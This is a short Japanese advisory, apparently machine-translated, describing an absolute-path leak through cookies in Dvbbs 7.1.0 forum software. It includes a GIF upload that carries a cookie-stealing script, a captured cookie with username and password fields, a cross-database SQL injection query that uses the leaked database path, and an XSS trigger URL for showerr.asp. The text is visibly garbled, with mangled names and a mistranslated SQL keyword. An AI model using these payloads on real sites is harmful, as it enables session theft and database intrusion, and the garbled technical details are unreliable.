Dvbs 7.1.0 cookieには、絶対パスのリークホールがあります。


脆弱性発見:LiNZI[B.C.T]@www.cnbct.org 
メーカー名:ネット前衛談 
メーカー住所:http://www.dvbbs.net/ 
脆弱性プログラム:Dvbs 7.1.0 
脆弱性の説明: 
Dvbs 7.1.0 のCookieにはリークサイトの絶対パスの脆弱性があり、攻撃者は他の技術に協力してSQLクロスライブラリクエリなどを実現することができます。 
抜け穴利用例: 
一、絶対的な脆弱性テストを漏洩する: 
公式のテストサイトに対して:bs.dbs.net 
図をアップロードします。コードは以下の通りです。 
GIF 89 a 
<script>alert(document.co okie) 
クローズドは以下の通りです。 
Cookie: ASPSESSIONSIDSSDSCBQD=NHANOBNCAPCPAMCFMAGDIJCB; dwebdvibs 7%2 E 1%2 E 0=UserID=617054&usercookies=1&userclass=%D 0%C 2%C 9%C 2%C 7&username=linzibt&password=t 8 ob 62646 v 6 HL&erhidden=Stard 2004 Dvbs= 
cookieを分析すると、サイトの絶対パスは以下の通りになります。 
d:\web\dvibs 7は議論の絶対的なパスです。 
二、攻撃の延長: 
wwww.host.com 
メインプログラムはsql注入ホールがありますが、テーブル名とフィールド名が見つかりません。 
注入点の仮説: 
wwww.host.com\linzi.asp?fuck=you 
論説をdvdとする 7.1.0 ,データベースはdata\\dvibs.aspで、ダウンロード防止処理をしました。 
上の動画ネットワークの暴力経路を利用して、クローズドは絶対パスを得ます。 d:\www\dvibs\data\dvibs.asp 
次のようなクロスライブラリクエリを実現します。 
wwww.host.com\linzi.asp?fuck=you and (プロジェクト count(*) from dvdadmin in "d:\www\dvibs\data\dvibs.asp") 
公式パッチ: 
まだない 
テスト方法は変更できます。ユーザーがターゲットサイトのCOOKIE情報を得るだけでいいです。BBSのユーザーではなく、以下の方法を使ってください。 
http://www.target.com/bbs/showerr.asp?BoardID=0&ErrCodes=60を選択します。60&action=alert 
ネットのshar.aspページのフィルタリングが悪いため、スパン効果が発生しました。